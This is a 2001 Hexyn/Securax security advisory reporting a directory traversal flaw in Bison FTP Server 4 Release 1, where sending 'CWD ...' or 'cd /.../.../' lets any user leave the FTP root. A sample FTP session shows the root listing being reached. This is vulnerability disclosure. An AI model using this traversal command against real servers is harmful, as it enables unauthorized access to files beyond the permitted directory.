Hexyn / Securax Advisory #17 - Bison FTP Server Directory Traversal Topic: Bison FTP Server Directory Traversal Announced: 2001-02-17 Affects: Bison FTP Server version 4 Release 1 DISCLAIMER: *********** THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS. THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 100% CORRECT. THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE. THIS ADVISORY HAS ONLY BEEN TESTED ON WINDOWS 98 AND ONLY ON A SMALL COLLECTION OF TEST SERVERS, SO THE OFFERED INFORMATION MAY NOT ALWAYS BE CORRECT. I. Problem Description ********************** Bison FTP Server is an FTP server for Windows 9x/NT. A bug allows any user to change to any directory. II. Impact ************** When sending the command "CWD ..." (or "cd ..." in the default UNIX FTP client), the server will go one directory up. Example: -------- 230 User anonymous logged in. Remote system type is UNIX. Using binary mode to transfer files. ftp> cd /.../.../ 250 CWD command successful. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for /. ftp> quit 221 Bye. III. Solution ************* At this time, no patch is available yet. IV. Credits *********** Bug discovered by t-Omicr0n Greets to: f0bic, The Incubus, R00T-dude, cicer0, vorlon, sentinel, oPr, Reggie, F_F, Shaolin_p, Segfau|t, NecrOmaN, Zym0t1c, l0r3, Preat0r, T0SH, zeroX, AreS, tips, Lacrima, GigaByte and everyone at #securax@irc.hexyn.be -- t-Omicr0n @ http://t-Omicr0n.hexyn.be